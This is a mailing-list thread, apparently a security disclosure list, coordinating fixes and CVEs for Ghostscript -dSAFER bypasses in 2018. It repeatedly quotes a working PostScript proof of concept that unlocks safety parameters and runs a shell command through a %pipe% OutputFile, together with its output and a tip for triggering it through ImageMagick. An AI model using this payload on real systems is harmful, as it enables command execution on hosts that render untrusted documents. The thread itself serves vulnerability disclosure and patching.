# 699658 - Bypassing PermitFileReading by handling undefinedfilename
errors
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0b6cd1918e1ec4ffd087400a754a845180a4522b
Post by Tavis Ormandy
# 699660 - shading_param incomplete type checking
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=e01e77a36cbb2e0277bc3a63852244bec41be0f6
Post by Tavis Ormandy
# 699660 - shading_param incomplete type checking
CVE-2018-15909
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c432131c3f
# 699661 - pdf14 garbage collection memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=971472c83a345a16dac9f90f91258bb22dd77f22
Post by Tavis Ormandy
# 699663 - .setdistillerkeys memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=241d911127
# 699664 - corrupt device object after error in job
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0d3901189f
# 699657 - .tempfile SAFER restrictions seem to be broken
CVE-2018-15908
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=8e9ce5016db968b40e4ec255a3005f2786cce45f
Post by Tavis Ormandy
# 699665 - memory corruption in aesdecode
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b575e1ec42
CVE-2018-15911
Post by Tavis Ormandy
# 699668 - .definemodifiedfont memory corruption if /typecheck is handled
Tavis
On Thu, Aug 23, 2018 at 8:05 AM Bob Friesenhahn <
Post by Bob Friesenhahn
Post by Leonardo Taccari
(Regarding the `file.ps2' and `file.ps3' examples without `PS2:' or
`PS3:' prefixes according `convert -debug Policy -log "%e"' it seems
Domain: Coder; rights=Read; pattern="PS" ...
...so should be blocked by the workaround described in
VU#332928. But please correct me if I'm wrong.)
This is likely due to header magic detection (e.g. "%!PS-Adobe"). It
is possible that a different path will be taken if the common
Postscript header is not detected. The file extension may then be
used as a hint. Also, there are a wide varieties of ImageMagick
versions in use, with a wide variety of behaviors.
The version of ImageMagick provided by the Ubuntu Linux I am using at
this moment dates from 2012!
Bob
--
Bob Friesenhahn
http://www.simplesystems.org/users/bfriesen/
Post by Tavis Ormandy
Post by Bob Friesenhahn
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
--
Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409 Nuernberg; Zi.
3.1-33,+49-911-740 53-432,,serv=loki,mail=wotan,type=real <
Tavis Ormandy
2018-08-29 20:43:22 UTC
Permalink
I should note, just add `userdict /setpagedevice undef` at the top if you
want to test it with ImageMagick.

Tavis.
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=520bb0ea7519aa3e79db78aaf0589dae02103764
# 699654 D /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5b5536fa88a9e885032bc0df3852c3439399a5c0
# 699670 gssetresolution memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
# 699671 handling /undefined results in SEGV
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
# 699676 PDF interpreter can leave dangerous operators available
Please note that not all issues are resolved, and I have exploits that
still work against HEAD.
$ cat testcase.pdf
%!PS
% This is ghostscript bug #699687 (split out from bug #699654)
a0 % just select a papersize to initialize page device
% You can't def HWResolution (for example), because currentpagedevice is
%
% GS>currentpagedevice wcheck ==
% false
%
% But you can just put or astore into it, because the array itself is
% GS>currentpagedevice /HWResolution get wcheck ==
% true
%
% If you put some junk in there, then grestore stops working.
currentpagedevice /HWResolution get 0 (foobar) put
% this grestore will fail, `stopped` just handles the error instead of
aborting.
{ grestore } stopped {} if
% GS>mark currentdevice getdeviceprops .dicttomark /.LockSafetyParams get
== pop
% false
% we can change and configure devices now, so make sure we're using one with
% a OutputFile property.
(ppmraw) selectdevice
% run a shell command
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
$ evince testcase.pdf
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
(libspectre) ghostscript reports: ioerror -12
Tavis.
Post by Marcus Meissner
Hi,
I had 4 CVEs assigned yesterday afternoon already working from CERTs list,
see inline comments below. Please adjust if something is incorrect in them.
CERT has mailed overnight that they will take care of the CVE assignment, so
I am defering the rest to them.
Ciao, Marcus
Post by Tavis Ormandy
Here is an update, Artifex made a press release
<
https://www.darkreading.com/prnewswire2.asp?rkey=20180824UN89145&filter=3930
Post by Tavis Ormandy
listing
some necessary commits, but the list was incomplete.
Here is a list of relevant commits I'm aware of so far, some issues are
still open with working exploits available. It's my understanding that
no
Post by Tavis Ormandy
new release is planned until late September, and vendors need to either
ship a git snapshot when all issues are resolved, or apply patches. I
have
Post by Tavis Ormandy
testcases for each problem, but I think the bugs will be visible
eventually
Post by Tavis Ormandy
so I'm not posting them here.
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
Post by Tavis Ormandy
# 699671
handling /undefined results in SEGV
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0edd3d6c63
# 699659 missing type check in ztype
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=78911a01b6 #
699654 A /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5516c614dc33
#
Post by Tavis Ormandy
699654 B /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=79cccf641486
#
Post by Tavis Ormandy
699654 C /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b326a716 #
699655
Post by Tavis Ormandy
- missing type checking in setcolor
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c3476dde #
699656
Post by Tavis Ormandy
- LockDistillerParams boolean missing type checks
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a054156d42
CVE-2018-15910
Post by Tavis Ormandy
# 699658 - Bypassing PermitFileReading by handling undefinedfilename
errors
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0b6cd1918e1ec4ffd087400a754a845180a4522b
Post by Tavis Ormandy
# 699660 - shading_param incomplete type checking
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=e01e77a36cbb2e0277bc3a63852244bec41be0f6
Post by Tavis Ormandy
# 699660 - shading_param incomplete type checking
CVE-2018-15909
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c432131c3f
# 699661 - pdf14 garbage collection memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=971472c83a345a16dac9f90f91258bb22dd77f22
Post by Tavis Ormandy
# 699663 - .setdistillerkeys memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=241d911127
# 699664 - corrupt device object after error in job
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0d3901189f
# 699657 - .tempfile SAFER restrictions seem to be broken
CVE-2018-15908
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=8e9ce5016db968b40e4ec255a3005f2786cce45f
Post by Tavis Ormandy
# 699665 - memory corruption in aesdecode
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b575e1ec42
CVE-2018-15911
Post by Tavis Ormandy
# 699668 - .definemodifiedfont memory corruption if /typecheck is
handled
Post by Tavis Ormandy
Tavis
On Thu, Aug 23, 2018 at 8:05 AM Bob Friesenhahn <
Post by Bob Friesenhahn
Post by Leonardo Taccari
(Regarding the `file.ps2' and `file.ps3' examples without `PS2:' or
`PS3:' prefixes according `convert -debug Policy -log "%e"' it seems
Domain: Coder; rights=Read; pattern="PS" ...
...so should be blocked by the workaround described in
VU#332928. But please correct me if I'm wrong.)
This is likely due to header magic detection (e.g. "%!PS-Adobe"). It
is possible that a different path will be taken if the common
Postscript header is not detected. The file extension may then be
used as a hint. Also, there are a wide varieties of ImageMagick
versions in use, with a wide variety of behaviors.
The version of ImageMagick provided by the Ubuntu Linux I am using at
this moment dates from 2012!
Bob
--
Bob Friesenhahn
http://www.simplesystems.org/users/bfriesen/
Post by Tavis Ormandy
Post by Bob Friesenhahn
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
--
Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409 Nuernberg; Zi.
3.1-33,+49-911-740 53-432,,serv=loki,mail=wotan,type=real <
Marcus Meissner
2018-09-03 10:57:47 UTC
Permalink
Hi,

I am still holding back CVE requesting as CERT promised to do this.

If they do not reply with a plan until tomorrow I will proceed with requesting.

Ciao, Marcus
Post by Tavis Ormandy
I should note, just add `userdict /setpagedevice undef` at the top if you
want to test it with ImageMagick.
Tavis.
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=520bb0ea7519aa3e79db78aaf0589dae02103764
# 699654 D /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5b5536fa88a9e885032bc0df3852c3439399a5c0
# 699670 gssetresolution memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
# 699671 handling /undefined results in SEGV
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
# 699676 PDF interpreter can leave dangerous operators available
Please note that not all issues are resolved, and I have exploits that
still work against HEAD.
$ cat testcase.pdf
%!PS
% This is ghostscript bug #699687 (split out from bug #699654)
a0 % just select a papersize to initialize page device
% You can't def HWResolution (for example), because currentpagedevice is
%
% GS>currentpagedevice wcheck ==
% false
%
% But you can just put or astore into it, because the array itself is
% GS>currentpagedevice /HWResolution get wcheck ==
% true
%
% If you put some junk in there, then grestore stops working.
currentpagedevice /HWResolution get 0 (foobar) put
% this grestore will fail, `stopped` just handles the error instead of
aborting.
{ grestore } stopped {} if
% GS>mark currentdevice getdeviceprops .dicttomark /.LockSafetyParams get
== pop
% false
% we can change and configure devices now, so make sure we're using one with
% a OutputFile property.
(ppmraw) selectdevice
% run a shell command
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
$ evince testcase.pdf
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
(libspectre) ghostscript reports: ioerror -12
Tavis.
Post by Marcus Meissner
Hi,
I had 4 CVEs assigned yesterday afternoon already working from CERTs list,
see inline comments below. Please adjust if something is incorrect in them.
CERT has mailed overnight that they will take care of the CVE assignment, so
I am defering the rest to them.
Ciao, Marcus
Post by Tavis Ormandy
Here is an update, Artifex made a press release
<
https://www.darkreading.com/prnewswire2.asp?rkey=20180824UN89145&filter=3930
Post by Tavis Ormandy
listing
some necessary commits, but the list was incomplete.
Here is a list of relevant commits I'm aware of so far, some issues are
still open with working exploits available. It's my understanding that
no
Post by Tavis Ormandy
new release is planned until late September, and vendors need to either
ship a git snapshot when all issues are resolved, or apply patches. I
have
Post by Tavis Ormandy
testcases for each problem, but I think the bugs will be visible
eventually
Post by Tavis Ormandy
so I'm not posting them here.
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
Post by Tavis Ormandy
# 699671
handling /undefined results in SEGV
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0edd3d6c63
# 699659 missing type check in ztype
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=78911a01b6 #
699654 A /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5516c614dc33
#
Post by Tavis Ormandy
699654 B /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=79cccf641486
#
Post by Tavis Ormandy
699654 C /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b326a716 #
699655
Post by Tavis Ormandy
- missing type checking in setcolor
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c3476dde #
699656
Post by Tavis Ormandy
- LockDistillerParams boolean missing type checks
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a054156d42
CVE-2018-15910
Post by Tavis Ormandy
# 699658 - Bypassing PermitFileReading by handling undefinedfilename
errors
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0b6cd1918e1ec4ffd087400a754a845180a4522b
Post by Tavis Ormandy
# 699660 - shading_param incomplete type checking
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=e01e77a36cbb2e0277bc3a63852244bec41be0f6
Post by Tavis Ormandy
# 699660 - shading_param incomplete type checking
CVE-2018-15909
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c432131c3f
# 699661 - pdf14 garbage collection memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=971472c83a345a16dac9f90f91258bb22dd77f22
Post by Tavis Ormandy
# 699663 - .setdistillerkeys memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=241d911127
# 699664 - corrupt device object after error in job
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0d3901189f
# 699657 - .tempfile SAFER restrictions seem to be broken
CVE-2018-15908
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=8e9ce5016db968b40e4ec255a3005f2786cce45f
Post by Tavis Ormandy
# 699665 - memory corruption in aesdecode
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b575e1ec42
CVE-2018-15911
Post by Tavis Ormandy
# 699668 - .definemodifiedfont memory corruption if /typecheck is
handled
Post by Tavis Ormandy
Tavis
On Thu, Aug 23, 2018 at 8:05 AM Bob Friesenhahn <
Post by Bob Friesenhahn
Post by Leonardo Taccari
(Regarding the `file.ps2' and `file.ps3' examples without `PS2:' or
`PS3:' prefixes according `convert -debug Policy -log "%e"' it seems
Domain: Coder; rights=Read; pattern="PS" ...
...so should be blocked by the workaround described in
VU#332928. But please correct me if I'm wrong.)
This is likely due to header magic detection (e.g. "%!PS-Adobe"). It
is possible that a different path will be taken if the common
Postscript header is not detected. The file extension may then be
used as a hint. Also, there are a wide varieties of ImageMagick
versions in use, with a wide variety of behaviors.
The version of ImageMagick provided by the Ubuntu Linux I am using at
this moment dates from 2012!
Bob
--
Bob Friesenhahn
http://www.simplesystems.org/users/bfriesen/
Post by Tavis Ormandy
Post by Bob Friesenhahn
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
--
Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409 Nuernberg; Zi.
3.1-33,+49-911-740 53-432,,serv=loki,mail=wotan,type=real <
--
Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409 Nuernberg; Zi. 3.1-33,+49-911-740 53-432,,serv=loki,mail=wotan,type=real <***@suse.de>
Tavis Ormandy
2018-09-04 18:47:58 UTC
Permalink
Thanks Marcus. FWIW, over the weekend upstream fixed all of the bugs I had
opened. Just looking this morning and I can see one or two of the fixes
were incomplete, I'll file new bugs and hopefully new fixes make it into
9.24 release.

(I'm only fuzzing with sort -R < postscript_commands.txt | gs -dSAFER, so
totally possible we'll have to do this again soon)

Tavis.

(p.s. I'm not exaggerating about the sort -R, that's literally how I'm
fuzzing it)
Post by Marcus Meissner
Hi,
I am still holding back CVE requesting as CERT promised to do this.
If they do not reply with a plan until tomorrow I will proceed with requesting.
Ciao, Marcus
Post by Tavis Ormandy
I should note, just add `userdict /setpagedevice undef` at the top if you
want to test it with ImageMagick.
Tavis.
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=520bb0ea7519aa3e79db78aaf0589dae02103764
Post by Tavis Ormandy
Post by Tavis Ormandy
# 699654 D /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5b5536fa88a9e885032bc0df3852c3439399a5c0
Post by Tavis Ormandy
Post by Tavis Ormandy
# 699670 gssetresolution memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
Post by Tavis Ormandy
Post by Tavis Ormandy
# 699671 handling /undefined results in SEGV
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
Post by Tavis Ormandy
Post by Tavis Ormandy
# 699676 PDF interpreter can leave dangerous operators available
Please note that not all issues are resolved, and I have exploits that
still work against HEAD.
For example, this will still work if you pull master as of this
$ cat testcase.pdf
%!PS
% This is ghostscript bug #699687 (split out from bug #699654)
a0 % just select a papersize to initialize page device
% You can't def HWResolution (for example), because currentpagedevice
is
Post by Tavis Ormandy
Post by Tavis Ormandy
%
% GS>currentpagedevice wcheck ==
% false
%
% But you can just put or astore into it, because the array itself is
% GS>currentpagedevice /HWResolution get wcheck ==
% true
%
% If you put some junk in there, then grestore stops working.
currentpagedevice /HWResolution get 0 (foobar) put
% this grestore will fail, `stopped` just handles the error instead of
aborting.
{ grestore } stopped {} if
% now LockSafetyParams will be incorrectly unset, you can check like
% GS>mark currentdevice getdeviceprops .dicttomark /.LockSafetyParams
get
Post by Tavis Ormandy
Post by Tavis Ormandy
== pop
% false
% we can change and configure devices now, so make sure we're using one with
% a OutputFile property.
(ppmraw) selectdevice
% run a shell command
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
$ evince testcase.pdf
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
(libspectre) ghostscript reports: ioerror -12
Tavis.
Post by Marcus Meissner
Hi,
I had 4 CVEs assigned yesterday afternoon already working from CERTs
list,
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
see inline comments below. Please adjust if something is incorrect in them.
CERT has mailed overnight that they will take care of the CVE
assignment,
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
so
I am defering the rest to them.
Ciao, Marcus
Post by Tavis Ormandy
Here is an update, Artifex made a press release
<
https://www.darkreading.com/prnewswire2.asp?rkey=20180824UN89145&filter=3930
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
listing
some necessary commits, but the list was incomplete.
Here is a list of relevant commits I'm aware of so far, some issues
are
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
still open with working exploits available. It's my understanding
that
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
no
Post by Tavis Ormandy
new release is planned until late September, and vendors need to
either
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
ship a git snapshot when all issues are resolved, or apply patches.
I
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
have
Post by Tavis Ormandy
testcases for each problem, but I think the bugs will be visible
eventually
Post by Tavis Ormandy
so I'm not posting them here.
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699671
handling /undefined results in SEGV
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0edd3d6c63
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699659 missing type check in ztype
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=78911a01b6 #
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
699654 A /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5516c614dc33
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
#
Post by Tavis Ormandy
699654 B /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=79cccf641486
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
#
Post by Tavis Ormandy
699654 C /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b326a716
#
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
699655
Post by Tavis Ormandy
- missing type checking in setcolor
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c3476dde
#
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
699656
Post by Tavis Ormandy
- LockDistillerParams boolean missing type checks
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a054156d42
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
CVE-2018-15910
Post by Tavis Ormandy
# 699658 - Bypassing PermitFileReading by handling undefinedfilename
errors
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0b6cd1918e1ec4ffd087400a754a845180a4522b
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699660 - shading_param incomplete type checking
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=e01e77a36cbb2e0277bc3a63852244bec41be0f6
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699660 - shading_param incomplete type checking
CVE-2018-15909
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c432131c3f
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699661 - pdf14 garbage collection memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=971472c83a345a16dac9f90f91258bb22dd77f22
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699663 - .setdistillerkeys memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=241d911127
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699664 - corrupt device object after error in job
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0d3901189f
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699657 - .tempfile SAFER restrictions seem to be broken
CVE-2018-15908
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=8e9ce5016db968b40e4ec255a3005f2786cce45f
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699665 - memory corruption in aesdecode
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b575e1ec42
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
CVE-2018-15911
Post by Tavis Ormandy
# 699668 - .definemodifiedfont memory corruption if /typecheck is
handled
Post by Tavis Ormandy
Tavis
On Thu, Aug 23, 2018 at 8:05 AM Bob Friesenhahn <
Post by Bob Friesenhahn
Post by Leonardo Taccari
(Regarding the `file.ps2' and `file.ps3' examples without
`PS2:' or
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
Post by Bob Friesenhahn
Post by Leonardo Taccari
`PS3:' prefixes according `convert -debug Policy -log "%e"' it
seems
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
Post by Bob Friesenhahn
Post by Leonardo Taccari
Domain: Coder; rights=Read; pattern="PS" ...
...so should be blocked by the workaround described in
VU#332928. But please correct me if I'm wrong.)
This is likely due to header magic detection (e.g.
"%!PS-Adobe"). It
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
Post by Bob Friesenhahn
is possible that a different path will be taken if the common
Postscript header is not detected. The file extension may then be
used as a hint. Also, there are a wide varieties of ImageMagick
versions in use, with a wide variety of behaviors.
The version of ImageMagick provided by the Ubuntu Linux I am
using at
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
Post by Bob Friesenhahn
this moment dates from 2012!
Bob
--
Bob Friesenhahn
http://www.simplesystems.org/users/bfriesen/
Post by Tavis Ormandy
Post by Bob Friesenhahn
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
--
Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409 Nuernberg;
Zi.
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
3.1-33,+49-911-740 53-432,,serv=loki,mail=wotan,type=real <
--
Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409 Nuernberg; Zi.
3.1-33,+49-911-740 53-432,,serv=loki,mail=wotan,type=real <
Tavis Ormandy
2018-09-04 19:59:23 UTC
Permalink
OK, well, the fixes missed 9.24 so vendors will have to either ship patches
once they land or wait for 9.25.

$ ./gs -v
GPL Ghostscript 9.24 (2018-09-03)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
$ ./gs -q -dSAFER -sDEVICE=ppmraw -f testcase.ps
uid=1000(taviso) gid=1000(taviso)

Let me know if anyone wants that testcase.

Tavis.
Post by Tavis Ormandy
Thanks Marcus. FWIW, over the weekend upstream fixed all of the bugs I had
opened. Just looking this morning and I can see one or two of the fixes
were incomplete, I'll file new bugs and hopefully new fixes make it into
9.24 release.
(I'm only fuzzing with sort -R < postscript_commands.txt | gs -dSAFER, so
totally possible we'll have to do this again soon)
Tavis.
(p.s. I'm not exaggerating about the sort -R, that's literally how I'm
fuzzing it)
Post by Marcus Meissner
Hi,
I am still holding back CVE requesting as CERT promised to do this.
If they do not reply with a plan until tomorrow I will proceed with requesting.
Ciao, Marcus
Post by Tavis Ormandy
I should note, just add `userdict /setpagedevice undef` at the top if
you
Post by Tavis Ormandy
want to test it with ImageMagick.
Tavis.
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=520bb0ea7519aa3e79db78aaf0589dae02103764
Post by Tavis Ormandy
Post by Tavis Ormandy
# 699654 D /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5b5536fa88a9e885032bc0df3852c3439399a5c0
Post by Tavis Ormandy
Post by Tavis Ormandy
# 699670 gssetresolution memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
Post by Tavis Ormandy
Post by Tavis Ormandy
# 699671 handling /undefined results in SEGV
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
Post by Tavis Ormandy
Post by Tavis Ormandy
# 699676 PDF interpreter can leave dangerous operators available
Please note that not all issues are resolved, and I have exploits that
still work against HEAD.
For example, this will still work if you pull master as of this
$ cat testcase.pdf
%!PS
% This is ghostscript bug #699687 (split out from bug #699654)
a0 % just select a papersize to initialize page device
% You can't def HWResolution (for example), because currentpagedevice
is
Post by Tavis Ormandy
Post by Tavis Ormandy
%
% GS>currentpagedevice wcheck ==
% false
%
% But you can just put or astore into it, because the array itself is
% GS>currentpagedevice /HWResolution get wcheck ==
% true
%
% If you put some junk in there, then grestore stops working.
currentpagedevice /HWResolution get 0 (foobar) put
% this grestore will fail, `stopped` just handles the error instead of
aborting.
{ grestore } stopped {} if
% now LockSafetyParams will be incorrectly unset, you can check like
% GS>mark currentdevice getdeviceprops .dicttomark /.LockSafetyParams
get
Post by Tavis Ormandy
Post by Tavis Ormandy
== pop
% false
% we can change and configure devices now, so make sure we're using
one
Post by Tavis Ormandy
Post by Tavis Ormandy
with
% a OutputFile property.
(ppmraw) selectdevice
% run a shell command
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
$ evince testcase.pdf
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
(libspectre) ghostscript reports: ioerror -12
Tavis.
Post by Marcus Meissner
Hi,
I had 4 CVEs assigned yesterday afternoon already working from CERTs
list,
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
see inline comments below. Please adjust if something is incorrect in them.
CERT has mailed overnight that they will take care of the CVE
assignment,
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
so
I am defering the rest to them.
Ciao, Marcus
Post by Tavis Ormandy
Here is an update, Artifex made a press release
<
https://www.darkreading.com/prnewswire2.asp?rkey=20180824UN89145&filter=3930
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
listing
some necessary commits, but the list was incomplete.
Here is a list of relevant commits I'm aware of so far, some
issues are
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
still open with working exploits available. It's my understanding
that
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
no
Post by Tavis Ormandy
new release is planned until late September, and vendors need to
either
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
ship a git snapshot when all issues are resolved, or apply
patches. I
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
have
Post by Tavis Ormandy
testcases for each problem, but I think the bugs will be visible
eventually
Post by Tavis Ormandy
so I'm not posting them here.
